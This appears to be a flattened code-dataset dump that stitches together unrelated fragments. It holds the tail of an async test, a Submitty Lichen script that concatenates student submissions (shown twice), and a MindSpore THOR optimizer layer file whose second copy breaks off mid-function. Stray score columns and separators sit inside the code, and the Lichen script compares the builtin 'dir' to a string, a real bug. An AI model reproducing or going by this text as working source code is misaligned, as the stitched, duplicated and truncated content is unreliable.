subscription = source.subscribe(on_next, on_error, on_completed)
subscription.dispose()
loop.run_until_complete(go())
assert(all(success)) | 0.439026 | 0.318287 |
import argparse
import os
import sys
import json
import time
import humanize
import fnmatch
import hashlib
from pathlib import Path
IGNORED_FILES = [
".submit.timestamp",
".user_assignment_access.json"
]
with open(Path(__file__).resolve().parent / "lichen_config.json") as lichen_config_file:
LICHEN_CONFIG = json.load(lichen_config_file)
# returns a string containing the contents of the files which match the regex in the specified dir
def getConcatFilesInDir(input_dir, regex_patterns):
result = ""
for my_dir, _dirs, my_files in os.walk(input_dir):
# Determine if regex should be used (blank regex is equivalent to selecting all files)
files = sorted(my_files)
if regex_patterns[0] != "":
files_filtered = []
# resolve all of the additions
for e in regex_patterns:
# Regex patterns starting with a ! indicate that files should be excluded
if not e.strip().startswith("!"):
files_filtered.extend(fnmatch.filter(files, e.strip()))
# resolve the subtractions
for e in regex_patterns:
if e.strip().startswith("!"):
files_filtered = [file for file in files_filtered if file not in
fnmatch.filter(files_filtered, e.strip().replace("!", ""))]
files = files_filtered
for my_file in files:
# exclude any files we have ignored for all submissions
if my_file in IGNORED_FILES:
continue
absolute_path = os.path.join(my_dir, my_file)
# print a separator & filename
with open(absolute_path, encoding='ISO-8859-1') as tmp:
result += f"==== {my_file} ====\n"
# append the contents of the file
result += tmp.read() + "\n"
return result
# This function is passed a path to a gradeable and an output path to place files in and
# concatenates all of the files for each submission into a single file in the output directory
# returns the total size of the files concatenated
def processGradeable(basepath, config, input_dir, output_dir, total_concat):
# basic error checking
if not Path(input_dir).exists():
raise SystemExit(f"ERROR: Unable to find directory {input_dir}")
if Path(input_dir).group() != Path(basepath).group():
raise SystemExit(f"ERROR: Group for directory {input_dir} does not"
f"match group for {basepath} directory")
# loop over each user
for user in sorted(os.listdir(input_dir)):
user_path = os.path.join(input_dir, user)
if not os.path.isdir(user_path):
continue
elif user in config["ignore_submissions"]:
continue
if config["version"] == "active_version":
# get the user's active version from their settings file if it exists, else get
# most recent version for compatibility with early versions of Submitty
submissions_details_path = os.path.join(user_path, 'user_assignment_settings.json')
if os.path.exists(submissions_details_path):
with open(submissions_details_path) as details_file:
details_json = json.load(details_file)
my_active_version = int(details_json["active_version"])
else:
# get the most recent version
my_active_version = sorted(os.listdir(user_path))[-1]
# loop over each version
for version in sorted(os.listdir(user_path)):
version_path = os.path.join(user_path, version)
if dir == "results":
# only the "details" folder within "results" contains files relevant to Lichen
version_path = os.path.join(version_path, "details")
if not os.path.isdir(version_path):
continue
if config["version"] == "active_version" and int(version) != my_active_version:
continue
output_file_path = os.path.join(output_dir, user, version, "submission.concatenated")
if not os.path.exists(os.path.dirname(output_file_path)):
os.makedirs(os.path.dirname(output_file_path))
# append to concatenated file
with open(output_file_path, "a") as output_file:
concatenated_contents = getConcatFilesInDir(version_path, config["regex"])
output_file.write(concatenated_contents)
total_concat += sys.getsizeof(concatenated_contents)
# If we've exceeded the concatenation limit, kill program
checkTotalSize(total_concat)
return total_concat
def checkTotalSize(total_concat):
if total_concat > LICHEN_CONFIG['concat_max_total_bytes']:
raise SystemExit("ERROR! exceeded"
f"{humanize.naturalsize(LICHEN_CONFIG['concat_max_total_bytes'])}"
" of concatenated files allowed")
def parse_args():
parser = argparse.ArgumentParser(description="")
parser.add_argument("basepath")
parser.add_argument("datapath")
return parser.parse_args()
def validate(config, args):
# load parameters from the config to be checked
regex_patterns = config["regex"]
regex_dirs = config["regex_dirs"]
language = config["language"]
threshold = int(config["threshold"])
hash_size = int(config["hash_size"])
other_gradeables = config["other_gradeables"]
# Check we have a tokenizer to support the configured language
langs_data_json_path = "./data.json" # data.json is in the Lichen/bin directory after install
with open(langs_data_json_path, 'r') as langs_data_file:
langs_data = json.load(langs_data_file)
if language not in langs_data:
raise SystemExit(f"ERROR: tokenizing not supported for language {language}")
# Check values of common code threshold and hash size
if (threshold < 2):
raise SystemExit("ERROR: threshold must be >= 2")
if (hash_size < 1):
raise SystemExit("ERROR: hash_size must be >= 1")
# Check for backwards crawling
for e in regex_patterns:
if ".." in e:
raise SystemExit('ERROR: Invalid path component ".." in regex')
for gradeable in other_gradeables:
for field in gradeable:
if ".." in field:
raise SystemExit('ERROR: Invalid component ".." in other_gradeable path')
# check permissions to make sure we have access to the other gradeables
my_course_group_perms = Path(args.basepath).group()
for gradeable in other_gradeables:
if Path(args.datapath, gradeable["other_semester"], gradeable["other_course"]).group()\
!= my_course_group_perms:
raise SystemExit("ERROR: Invalid permissions to access course "
f"{gradeable['other_semester']}/{gradeable['other_course']}")
# check permissions for each path we are given (if any are provided)
if config.get("other_gradeable_paths") is not None:
for path in config["other_gradeable_paths"]:
if Path(path).group() != my_course_group_perms:
raise SystemExit(f"ERROR: Group for directory {path} does not"
f"match group for {args.basepath} directory")
# make sure the regex directory is one of the acceptable directories
for dir in regex_dirs:
if dir not in ["submissions", "results", "checkout"]:
raise SystemExit(f"ERROR: {dir} is not a valid input directory for Lichen")
def main():
start_time = time.time()
args = parse_args()
print("CONCATENATE ALL...", end="")
config_path = os.path.join(args.basepath, "config.json")
if not os.path.isfile(config_path):
raise SystemExit(f"ERROR! invalid config path provided ({config_path})")
with open(config_path) as config_file:
config = json.load(config_file)
# perform error checking on config parameters
validate(config, args)
# parameters to be used in this file
semester = config["semester"]
course = config["course"]
gradeable = config["gradeable"]
regex_patterns = config["regex"]
regex_dirs = config["regex_dirs"]
other_gradeables = config["other_gradeables"]
# optional field -> other_gradeable_paths=None if key doesn't exist
other_gradeable_paths = config.get("other_gradeable_paths")
# ==========================================================================
# loop through and concatenate the selected files for each user in this gradeable
total_concat = 0
for dir in regex_dirs:
input_path = os.path.join(args.datapath, semester, course, dir, gradeable)
output_path = os.path.join(args.basepath, "users")
total_concat = processGradeable(args.basepath, config,
input_path, output_path, total_concat)
# ==========================================================================
# loop over all of the other gradeables and concatenate their submissions
for other_gradeable in other_gradeables:
for dir in regex_dirs:
input_path = os.path.join(args.datapath,
other_gradeable["other_semester"],
other_gradeable["other_course"],
dir,
other_gradeable["other_gradeable"])
output_path = os.path.join(args.basepath, "other_gradeables",
f"{other_gradeable['other_semester']}__{other_gradeable['other_course']}__{other_gradeable['other_gradeable']}") # noqa: E501
total_concat = processGradeable(args.basepath, config,
input_path, output_path, total_concat)
# take care of any manually-specified paths if they exist
if other_gradeable_paths is not None:
for path in other_gradeable_paths:
# We hash the path as the name of the gradeable
dir_name = hashlib.md5(path.encode('utf-8')).hexdigest()
output_path = os.path.join(args.basepath, "other_gradeables", dir_name)
total_concat = processGradeable(args.basepath, config, path,
output_path, total_concat)
# ==========================================================================
# iterate over all of the created submissions, checking to see if they are empty
# and printing a message if so
empty_directories = [] # holds a list of users who had no files concatenated
for user in os.listdir(os.path.join(args.basepath, "users")):
user_path = os.path.join(args.basepath, "users", user)
for version in os.listdir(user_path):
version_path = os.path.join(user_path, version)
my_concatenated_file = os.path.join(version_path, "submission.concatenated")
with open(my_concatenated_file, "r") as my_cf:
if my_cf.read() == "":
empty_directories.append(f"{user}:{version}")
if len(empty_directories) > 0:
print("Warning: No files matched provided regex in selected directories for user(s):",
", ".join(empty_directories))
# do the same for the other gradeables
for other_gradeable in os.listdir(os.path.join(args.basepath, "other_gradeables")):
empty_directories = []
for other_user in os.listdir(os.path.join(args.basepath,
"other_gradeables", other_gradeable)):
other_user_path = os.path.join(args.basepath, "other_gradeables",
other_gradeable, other_user)
for other_version in os.listdir(other_user_path):
other_version_path = os.path.join(other_user_path, other_version)
my_concatenated_file = os.path.join(other_version_path, "submission.concatenated")
with open(my_concatenated_file, "r") as my_cf:
if my_cf.read() == "":
empty_directories.append(f"{other_user}:{other_version}")
if len(empty_directories) > 0:
print("Warning: No files matched provided regex in selected directories for user(s):",
", ".join(empty_directories), "in gradeable", other_gradeable)
# ==========================================================================
# concatenate provided code
with open(os.path.join(args.basepath, "provided_code",
"submission.concatenated"), "w") as file:
provided_code_files = os.path.join(args.basepath, "provided_code", "files")
provided_concatenated_files = getConcatFilesInDir(provided_code_files, regex_patterns)
file.write(provided_concatenated_files)
total_concat += sys.getsizeof(provided_concatenated_files)
checkTotalSize(total_concat)
# ==========================================================================
end_time = time.time()
print("done in " + "%.0f" % (end_time - start_time) + " seconds,",
humanize.naturalsize(total_concat) + " concatenated")
if __name__ == "__main__":
main() | bin/concatenate_all.py | import argparse
import os
import sys
import json
import time
import humanize
import fnmatch
import hashlib
from pathlib import Path
IGNORED_FILES = [
".submit.timestamp",
".user_assignment_access.json"
]
with open(Path(__file__).resolve().parent / "lichen_config.json") as lichen_config_file:
LICHEN_CONFIG = json.load(lichen_config_file)
# returns a string containing the contents of the files which match the regex in the specified dir
def getConcatFilesInDir(input_dir, regex_patterns):
result = ""
for my_dir, _dirs, my_files in os.walk(input_dir):
# Determine if regex should be used (blank regex is equivalent to selecting all files)
files = sorted(my_files)
if regex_patterns[0] != "":
files_filtered = []
# resolve all of the additions
for e in regex_patterns:
# Regex patterns starting with a ! indicate that files should be excluded
if not e.strip().startswith("!"):
files_filtered.extend(fnmatch.filter(files, e.strip()))
# resolve the subtractions
for e in regex_patterns:
if e.strip().startswith("!"):
files_filtered = [file for file in files_filtered if file not in
fnmatch.filter(files_filtered, e.strip().replace("!", ""))]
files = files_filtered
for my_file in files:
# exclude any files we have ignored for all submissions
if my_file in IGNORED_FILES:
continue
absolute_path = os.path.join(my_dir, my_file)
# print a separator & filename
with open(absolute_path, encoding='ISO-8859-1') as tmp:
result += f"==== {my_file} ====\n"
# append the contents of the file
result += tmp.read() + "\n"
return result
# This function is passed a path to a gradeable and an output path to place files in and
# concatenates all of the files for each submission into a single file in the output directory
# returns the total size of the files concatenated
def processGradeable(basepath, config, input_dir, output_dir, total_concat):
# basic error checking
if not Path(input_dir).exists():
raise SystemExit(f"ERROR: Unable to find directory {input_dir}")
if Path(input_dir).group() != Path(basepath).group():
raise SystemExit(f"ERROR: Group for directory {input_dir} does not"
f"match group for {basepath} directory")
# loop over each user
for user in sorted(os.listdir(input_dir)):
user_path = os.path.join(input_dir, user)
if not os.path.isdir(user_path):
continue
elif user in config["ignore_submissions"]:
continue
if config["version"] == "active_version":
# get the user's active version from their settings file if it exists, else get
# most recent version for compatibility with early versions of Submitty
submissions_details_path = os.path.join(user_path, 'user_assignment_settings.json')
if os.path.exists(submissions_details_path):
with open(submissions_details_path) as details_file:
details_json = json.load(details_file)
my_active_version = int(details_json["active_version"])
else:
# get the most recent version
my_active_version = sorted(os.listdir(user_path))[-1]
# loop over each version
for version in sorted(os.listdir(user_path)):
version_path = os.path.join(user_path, version)
if dir == "results":
# only the "details" folder within "results" contains files relevant to Lichen
version_path = os.path.join(version_path, "details")
if not os.path.isdir(version_path):
continue
if config["version"] == "active_version" and int(version) != my_active_version:
continue
output_file_path = os.path.join(output_dir, user, version, "submission.concatenated")
if not os.path.exists(os.path.dirname(output_file_path)):
os.makedirs(os.path.dirname(output_file_path))
# append to concatenated file
with open(output_file_path, "a") as output_file:
concatenated_contents = getConcatFilesInDir(version_path, config["regex"])
output_file.write(concatenated_contents)
total_concat += sys.getsizeof(concatenated_contents)
# If we've exceeded the concatenation limit, kill program
checkTotalSize(total_concat)
return total_concat
def checkTotalSize(total_concat):
if total_concat > LICHEN_CONFIG['concat_max_total_bytes']:
raise SystemExit("ERROR! exceeded"
f"{humanize.naturalsize(LICHEN_CONFIG['concat_max_total_bytes'])}"
" of concatenated files allowed")
def parse_args():
parser = argparse.ArgumentParser(description="")
parser.add_argument("basepath")
parser.add_argument("datapath")
return parser.parse_args()
def validate(config, args):
# load parameters from the config to be checked
regex_patterns = config["regex"]
regex_dirs = config["regex_dirs"]
language = config["language"]
threshold = int(config["threshold"])
hash_size = int(config["hash_size"])
other_gradeables = config["other_gradeables"]
# Check we have a tokenizer to support the configured language
langs_data_json_path = "./data.json" # data.json is in the Lichen/bin directory after install
with open(langs_data_json_path, 'r') as langs_data_file:
langs_data = json.load(langs_data_file)
if language not in langs_data:
raise SystemExit(f"ERROR: tokenizing not supported for language {language}")
# Check values of common code threshold and hash size
if (threshold < 2):
raise SystemExit("ERROR: threshold must be >= 2")
if (hash_size < 1):
raise SystemExit("ERROR: hash_size must be >= 1")
# Check for backwards crawling
for e in regex_patterns:
if ".." in e:
raise SystemExit('ERROR: Invalid path component ".." in regex')
for gradeable in other_gradeables:
for field in gradeable:
if ".." in field:
raise SystemExit('ERROR: Invalid component ".." in other_gradeable path')
# check permissions to make sure we have access to the other gradeables
my_course_group_perms = Path(args.basepath).group()
for gradeable in other_gradeables:
if Path(args.datapath, gradeable["other_semester"], gradeable["other_course"]).group()\
!= my_course_group_perms:
raise SystemExit("ERROR: Invalid permissions to access course "
f"{gradeable['other_semester']}/{gradeable['other_course']}")
# check permissions for each path we are given (if any are provided)
if config.get("other_gradeable_paths") is not None:
for path in config["other_gradeable_paths"]:
if Path(path).group() != my_course_group_perms:
raise SystemExit(f"ERROR: Group for directory {path} does not"
f"match group for {args.basepath} directory")
# make sure the regex directory is one of the acceptable directories
for dir in regex_dirs:
if dir not in ["submissions", "results", "checkout"]:
raise SystemExit(f"ERROR: {dir} is not a valid input directory for Lichen")
def main():
start_time = time.time()
args = parse_args()
print("CONCATENATE ALL...", end="")
config_path = os.path.join(args.basepath, "config.json")
if not os.path.isfile(config_path):
raise SystemExit(f"ERROR! invalid config path provided ({config_path})")
with open(config_path) as config_file:
config = json.load(config_file)
# perform error checking on config parameters
validate(config, args)
# parameters to be used in this file
semester = config["semester"]
course = config["course"]
gradeable = config["gradeable"]
regex_patterns = config["regex"]
regex_dirs = config["regex_dirs"]
other_gradeables = config["other_gradeables"]
# optional field -> other_gradeable_paths=None if key doesn't exist
other_gradeable_paths = config.get("other_gradeable_paths")
# ==========================================================================
# loop through and concatenate the selected files for each user in this gradeable
total_concat = 0
for dir in regex_dirs:
input_path = os.path.join(args.datapath, semester, course, dir, gradeable)
output_path = os.path.join(args.basepath, "users")
total_concat = processGradeable(args.basepath, config,
input_path, output_path, total_concat)
# ==========================================================================
# loop over all of the other gradeables and concatenate their submissions
for other_gradeable in other_gradeables:
for dir in regex_dirs:
input_path = os.path.join(args.datapath,
other_gradeable["other_semester"],
other_gradeable["other_course"],
dir,
other_gradeable["other_gradeable"])
output_path = os.path.join(args.basepath, "other_gradeables",
f"{other_gradeable['other_semester']}__{other_gradeable['other_course']}__{other_gradeable['other_gradeable']}") # noqa: E501
total_concat = processGradeable(args.basepath, config,
input_path, output_path, total_concat)
# take care of any manually-specified paths if they exist
if other_gradeable_paths is not None:
for path in other_gradeable_paths:
# We hash the path as the name of the gradeable
dir_name = hashlib.md5(path.encode('utf-8')).hexdigest()
output_path = os.path.join(args.basepath, "other_gradeables", dir_name)
total_concat = processGradeable(args.basepath, config, path,
output_path, total_concat)
# ==========================================================================
# iterate over all of the created submissions, checking to see if they are empty
# and printing a message if so
empty_directories = [] # holds a list of users who had no files concatenated
for user in os.listdir(os.path.join(args.basepath, "users")):
user_path = os.path.join(args.basepath, "users", user)
for version in os.listdir(user_path):
version_path = os.path.join(user_path, version)
my_concatenated_file = os.path.join(version_path, "submission.concatenated")
with open(my_concatenated_file, "r") as my_cf:
if my_cf.read() == "":
empty_directories.append(f"{user}:{version}")
if len(empty_directories) > 0:
print("Warning: No files matched provided regex in selected directories for user(s):",
", ".join(empty_directories))
# do the same for the other gradeables
for other_gradeable in os.listdir(os.path.join(args.basepath, "other_gradeables")):
empty_directories = []
for other_user in os.listdir(os.path.join(args.basepath,
"other_gradeables", other_gradeable)):
other_user_path = os.path.join(args.basepath, "other_gradeables",
other_gradeable, other_user)
for other_version in os.listdir(other_user_path):
other_version_path = os.path.join(other_user_path, other_version)
my_concatenated_file = os.path.join(other_version_path, "submission.concatenated")
with open(my_concatenated_file, "r") as my_cf:
if my_cf.read() == "":
empty_directories.append(f"{other_user}:{other_version}")
if len(empty_directories) > 0:
print("Warning: No files matched provided regex in selected directories for user(s):",
", ".join(empty_directories), "in gradeable", other_gradeable)
# ==========================================================================
# concatenate provided code
with open(os.path.join(args.basepath, "provided_code",
"submission.concatenated"), "w") as file:
provided_code_files = os.path.join(args.basepath, "provided_code", "files")
provided_concatenated_files = getConcatFilesInDir(provided_code_files, regex_patterns)
file.write(provided_concatenated_files)
total_concat += sys.getsizeof(provided_concatenated_files)
checkTotalSize(total_concat)
# ==========================================================================
end_time = time.time()
print("done in " + "%.0f" % (end_time - start_time) + " seconds,",
humanize.naturalsize(total_concat) + " concatenated")
if __name__ == "__main__":
main() | 0.335351 | 0.113432 |
"""thor_layer"""
import numpy as np
import mindspore.common.dtype as mstype
from mindspore._checkparam import check_bool, check_int_positive
from mindspore.common.initializer import TruncatedNormal, initializer
from mindspore.common.parameter import Parameter
from mindspore.common.tensor import Tensor
from mindspore.nn.cell import Cell
from mindspore.nn.layer.activation import get_activation
from mindspore.ops import operations as P
class Embedding_Thor(Cell):
"""
A embeddings lookup table with a fixed dictionary and size.
Args:
vocab_size (int): Size of the dictionary of embeddings.
embedding_size (int): The size of each embedding vector.
embedding_shape (list): [batch_size, seq_length, embedding_size], the shape of
each embedding vector.
use_one_hot_embeddings (bool): Specifies whether to use one hot encoding form. Default: False.
initializer_range (float): Initialization value of TruncatedNormal. Default: 0.02.
"""
def __init__(self,
vocab_size,
embedding_size,
embedding_shape,
use_one_hot_embeddings=False,
initializer_range=0.02,
name='embedding_table',
batch_size=12,
damping=0.03,
loss_scale=1,
frequency=100,
):
super(Embedding_Thor, self).__init__()
self.vocab_size = vocab_size
self.use_one_hot_embeddings = use_one_hot_embeddings
self.embedding_table = Parameter(initializer
(TruncatedNormal(initializer_range),
[vocab_size, embedding_size]),
name=name)
self.thor = True
self.expand = P.ExpandDims()
self.shape_flat = (-1,)
self.gather = P.GatherV2()
self.one_hot = P.OneHot()
self.on_value = Tensor(1.0, mstype.float32)
self.off_value = Tensor(0.0, mstype.float32)
self.array_mul = P.MatMul()
self.reshape = P.Reshape()
self.em_shape = tuple(embedding_shape)
self.shape = P.Shape()
self.loss_scale = Tensor(1 / loss_scale, mstype.float16)
self.matrix_A_inv = Parameter(Tensor(np.zeros([vocab_size]).astype(np.float16)),
name='matrix_A_inv', requires_grad=False)
self.matrix_G_inv = Parameter(Tensor(np.zeros([embedding_size, embedding_size]).astype(np.float16)),
name="matrix_G_inv", requires_grad=False)
self.fake_G = Tensor(np.zeros([embedding_size, embedding_size]).astype(np.float16))
self.dampingA = Tensor(np.ones([vocab_size]).astype(np.float32))
self.dampingG = Tensor(np.identity(embedding_size), mstype.float32)
self.cov_step = Parameter(initializer(0, [1], mstype.int32), name="cov_step", requires_grad=False)
self.freq = Tensor(frequency, mstype.int32)
self.axis = 0
self.damping = damping
self.gather = P.GatherV2()
self.sqrt = P.Sqrt()
self.mul = P.Mul()
self.cast = P.Cast()
self.cube_matmul = P.CusMatMulCube(transpose_a=True)
self.vector_matmul = P.CusBatchMatMul()
self.cholesky = P.CusCholeskyTrsm()
self.matrix_combine = P.CusMatrixCombine()
self.reduce_sum = P.ReduceSum(keep_dims=False)
self.inv = P.Inv()
self.getG = P.InsertGradientOf(self.save_gradient)
self.batch_size = batch_size
def save_gradient(self, dout):
"""save_gradient"""
bs = self.batch_size
bs = self.cast(bs, mstype.float32)
out = dout
dout = self.mul(dout, self.loss_scale)
dout = self.mul(dout, bs)
shape = self.shape(dout)
normalizer = self.cast(shape[0], mstype.float32)
matrix_G = self.cube_matmul(dout, dout)
matrix_G = self.mul(matrix_G, 1.0 / normalizer)
damping_step = self.gather(self.damping, self.cov_step, 0)
damping_step = self.cast(damping_step, mstype.float32)
self.cov_step = self.cov_step + self.freq
damping = self.sqrt(damping_step)
dampingG = self.cast(self.dampingG, mstype.float32)
matrix_G = matrix_G + damping * dampingG
matrix_G_inv = self.cholesky(matrix_G)
matrix_G_inv = self.vector_matmul(matrix_G_inv, matrix_G_inv)
matrix_G_inv = self.matrix_combine(matrix_G_inv)
matrix_G_inv = self.cast(matrix_G_inv, mstype.float16)
self.matrix_G_inv = matrix_G_inv
return out
def construct(self, input_ids):
"""construct of Embedding_Thor"""
flat_ids = self.reshape(input_ids, self.shape_flat)
if self.use_one_hot_embeddings:
one_hot_ids = self.one_hot(flat_ids, self.vocab_size, self.on_value, self.off_value)
output_for_reshape = self.array_mul(one_hot_ids, self.embedding_table)
else:
if self.thor:
one_hot_ids = self.one_hot(flat_ids, self.vocab_size, self.on_value, self.off_value)
matrix_A = self.reduce_sum(one_hot_ids, 0)
normalizer = self.batch_size
normalizer = self.cast(normalizer, mstype.float32)
matrix_A = self.mul(matrix_A, 1.0 / normalizer)
damping_step = self.gather(self.damping, self.cov_step, self.axis)
damping_step = self.cast(damping_step, mstype.float32)
damping = self.sqrt(damping_step)
dampingA = self.cast(self.dampingA, mstype.float32)
matrix_A = matrix_A + damping * dampingA
matrix_A_inv = self.inv(matrix_A)
matrix_A_inv = self.cast(matrix_A_inv, mstype.float16)
self.matrix_A_inv = matrix_A_inv
self.matrix_G_inv = self.fake_G
output_for_reshape = self.gather(self.embedding_table, flat_ids, 0)
output_for_reshape = self.getG(output_for_reshape)
else:
output_for_reshape = self.gather(self.embedding_table, flat_ids, 0)
output = self.reshape(output_for_reshape, self.em_shape)
return output, self.embedding_table
class Dense_Thor(Cell):
"""Dense_Thor"""
def __init__(self,
in_channels,
out_channels,
weight_init='normal',
bias_init='zeros',
damping=0.03,
loss_scale=1,
frequency=100,
has_bias=False,
activation=None,
batch_size=12):
super(Dense_Thor, self).__init__()
self.in_channels = check_int_positive(in_channels)
self.out_channels = check_int_positive(out_channels)
self.has_bias = check_bool(has_bias)
self.thor = True
if isinstance(weight_init, Tensor):
if weight_init.dim() != 2 or weight_init.shape()[0] != out_channels or \
weight_init.shape()[1] != in_channels:
raise ValueError("weight_init shape error")
self.weight = Parameter(initializer(weight_init, [out_channels, in_channels]), name="weight")
if self.has_bias:
if isinstance(bias_init, Tensor):
if bias_init.dim() != 1 or bias_init.shape()[0] != out_channels:
raise ValueError("bias_init shape error")
self.bias = Parameter(initializer(bias_init, [out_channels]), name="bias")
self.matmul = P.MatMul(transpose_b=True)
self.bias_add = P.BiasAdd()
self.activation = get_activation(activation)
self.activation_flag = self.activation is not None
self.matrix_A_inv = Parameter(Tensor(np.zeros([in_channels, in_channels]).astype(np.float16)),
name='matrix_A_inv', requires_grad=False)
self.matrix_G_inv = Parameter(Tensor(np.zeros([out_channels, out_channels]).astype(np.float16)),
name="matrix_G_inv", requires_grad=False)
self.fake_G = Tensor(np.zeros([out_channels, out_channels]).astype(np.float16))
self.matmul = P.MatMul(transpose_b=True)
self.cube_matmul = P.CusMatMulCube(transpose_a=True)
self.matrix_combine = P.CusMatrixCombine()
self.cholesky = P.CusCholeskyTrsm()
self.shape = P.Shape()
self.reshape = P.Reshape()
self.transpose = P.Transpose()
self.cov_step = Parameter(initializer(0, [1], mstype.int32), name="cov_step", requires_grad=False)
self.mul = P.Mul()
self.cast = P.Cast()
self.damping = damping
self.loss_scale = Tensor(1 / loss_scale, mstype.float16)
self.vector_matmul = P.CusBatchMatMul()
self.gather = P.GatherV2()
self.assignadd = P.AssignAdd()
self.freq = Tensor(frequency, mstype.int32)
self.axis = 0
self.abs = P.Abs()
self.reduce_max = P.ReduceMax(keep_dims=False)
self.log = P.Log()
self.exp = P.Exp()
self.dampingA = Tensor(np.identity(in_channels), mstype.float32)
self.dampingG = Tensor(np.identity(out_channels), mstype.float32)
self.sqrt = P.Sqrt()
self.getG = P.InsertGradientOf(self.save_gradient)
self.batch_size = batch_size
def save_gradient(self, dout):
"""save_gradient"""
bs = self.cast(self.batch_size, mstype.float32)
out = dout
dout = self.mul(dout, self.loss_scale)
dout = self.mul(dout, bs)
shape = self.shape(dout)
normalizer = self.cast(shape[0], mstype.float32)
matrix_G = self.cube_matmul(dout, dout)
matrix_G = self.mul(matrix_G, 1.0 / normalizer)
damping_step = self.gather(self.damping, self.cov_step, 0)
damping_step = self.cast(damping_step, mstype.float32)
self.cov_step = self.cov_step + self.freq
damping = self.sqrt(damping_step)
dampingG = self.cast(self.dampingG, mstype.float32)
matrix_G = matrix_G + damping * dampingG
matrix_G_inv = self.cholesky(matrix_G)
matrix_G_inv = self.vector_matmul(matrix_G_inv, matrix_G_inv)
matrix_G_inv = self.matrix_combine(matrix_G_inv)
matrix_G_inv = self.cast(matrix_G_inv, mstype.float16)
self.matrix_G_inv = matrix_G_inv
return out
def construct(self, x):
"""construct"""
if self.thor:
inputs = self.cube_matmul(x, x)
shape = self.shape(x)
normalizer = self.cast(shape[0], mstype.float32)
matrix_A = self.mul(inputs, 1.0 / normalizer)
damping_step = self.gather(self.damping, self.cov_step, self.axis)
damping_step = self.cast(damping_step, mstype.float32)
damping = self.sqrt(damping_step)
dampingA = self.cast(self.dampingA, mstype.float32)
matrix_A = matrix_A + damping * dampingA
matrix_A_inv = self.cholesky(matrix_A)
matrix_A_inv = self.vector_matmul(matrix_A_inv, matrix_A_inv)
matrix_A_inv = self.matrix_combine(matrix_A_inv)
matrix_A_inv = self.cast(matrix_A_inv, mstype.float16)
self.matrix_A_inv = matrix_A_inv
self.matrix_G_inv = self.fake_G
output = self.matmul(x, self.weight)
output = self.getG(output)
else:
output = self.matmul(x, self.weight)
if self.has_bias:
output = self.bias_add(output, self.bias)
if self.activation_flag:
return self.activation(output)
return output
def extend_repr(self):
"""extend_repr"""
str_info = 'in_channels={}, out_channels={}, weight={}, has_bias={}' \
.format(self.in_channels, self.out_channels, self.weight, self.has_bias)
if self.has_bias:
str_info = str_info + ', bias={}'.format(self.bias)
if self.activation_flag:
str_info = str_info + ', activation={}'.format(self.activation)
return str_info | model_zoo/official/nlp/bert_thor/src/thor_layer.py | """thor_layer"""
import numpy as np
import mindspore.common.dtype as mstype
from mindspore._checkparam import check_bool, check_int_positive
from mindspore.common.initializer import TruncatedNormal, initializer
from mindspore.common.parameter import Parameter
from mindspore.common.tensor import Tensor
from mindspore.nn.cell import Cell
from mindspore.nn.layer.activation import get_activation
from mindspore.ops import operations as P
class Embedding_Thor(Cell):
"""
A embeddings lookup table with a fixed dictionary and size.
Args:
vocab_size (int): Size of the dictionary of embeddings.
embedding_size (int): The size of each embedding vector.
embedding_shape (list): [batch_size, seq_length, embedding_size], the shape of
each embedding vector.
use_one_hot_embeddings (bool): Specifies whether to use one hot encoding form. Default: False.
initializer_range (float): Initialization value of TruncatedNormal. Default: 0.02.
"""
def __init__(self,
vocab_size,
embedding_size,
embedding_shape,
use_one_hot_embeddings=False,
initializer_range=0.02,
name='embedding_table',
batch_size=12,
damping=0.03,
loss_scale=1,
frequency=100,
):
super(Embedding_Thor, self).__init__()
self.vocab_size = vocab_size
self.use_one_hot_embeddings = use_one_hot_embeddings
self.embedding_table = Parameter(initializer
(TruncatedNormal(initializer_range),
[vocab_size, embedding_size]),
name=name)
self.thor = True
self.expand = P.ExpandDims()
self.shape_flat = (-1,)
self.gather = P.GatherV2()
self.one_hot = P.OneHot()
self.on_value = Tensor(1.0, mstype.float32)
self.off_value = Tensor(0.0, mstype.float32)
self.array_mul = P.MatMul()
self.reshape = P.Reshape()
self.em_shape = tuple(embedding_shape)
self.shape = P.Shape()
self.loss_scale = Tensor(1 / loss_scale, mstype.float16)
self.matrix_A_inv = Parameter(Tensor(np.zeros([vocab_size]).astype(np.float16)),
name='matrix_A_inv', requires_grad=False)
self.matrix_G_inv = Parameter(Tensor(np.zeros([embedding_size, embedding_size]).astype(np.float16)),
name="matrix_G_inv", requires_grad=False)
self.fake_G = Tensor(np.zeros([embedding_size, embedding_size]).astype(np.float16))
self.dampingA = Tensor(np.ones([vocab_size]).astype(np.float32))
self.dampingG = Tensor(np.identity(embedding_size), mstype.float32)
self.cov_step = Parameter(initializer(0, [1], mstype.int32), name="cov_step", requires_grad=False)
self.freq = Tensor(frequency, mstype.int32)
self.axis = 0
self.damping = damping
self.gather = P.GatherV2()
self.sqrt = P.Sqrt()
self.mul = P.Mul()
self.cast = P.Cast()
self.cube_matmul = P.CusMatMulCube(transpose_a=True)
self.vector_matmul = P.CusBatchMatMul()
self.cholesky = P.CusCholeskyTrsm()
self.matrix_combine = P.CusMatrixCombine()
self.reduce_sum = P.ReduceSum(keep_dims=False)
self.inv = P.Inv()
self.getG = P.InsertGradientOf(self.save_gradient)
self.batch_size = batch_size
def save_gradient(self, dout):
"""save_gradient"""
bs = self.batch_size
bs = self.cast(bs, mstype.float32)
out = dout
dout = self.mul(dout, self.loss_scale)
dout = self.mul(dout, bs)
shape = self.shape(dout)
normalizer = self.cast(shape[0], mstype.float32)
matrix_G = self.cube_matmul(dout, dout)
matrix_G = self.mul(matrix_G, 1.0 / normalizer)
damping_step = self.gather(self.damping, self.cov_step, 0)
damping_step = self.cast(damping_step, mstype.float32)
self.cov_step = self.cov_step + self.freq
damping = self.sqrt(damping_step)
dampingG = self.cast(self.dampingG, mstype.float32)
matrix_G = matrix_G + damping * dampingG
matrix_G_inv = self.cholesky(matrix_G)
matrix_G_inv = self.vector_matmul(matrix_G_inv, matrix_G_inv)
matrix_G_inv = self.matrix_combine(matrix_G_inv)
matrix_G_inv = self.cast(matrix_G_inv, mstype.float16)
self.matrix_G_inv = matrix_G_inv
return out
def construct(self, input_ids):
"""construct of Embedding_Thor"""
flat_ids = self.reshape(input_ids, self.shape_flat)
if self.use_one_hot_embeddings:
one_hot_ids = self.one_hot(flat_ids, self.vocab_size, self.on_value, self.off_value)
output_for_reshape = self.array_mul(one_hot_ids, self.embedding_table)
else:
if self.thor:
one_hot_ids = self.one_hot(flat_ids, self.vocab_size, self.on_value, self.off_value)
matrix_A = self.reduce_sum(one_hot_ids, 0)
normalizer = self.batch_size
normalizer = self.cast(normalizer, mstype.float32)
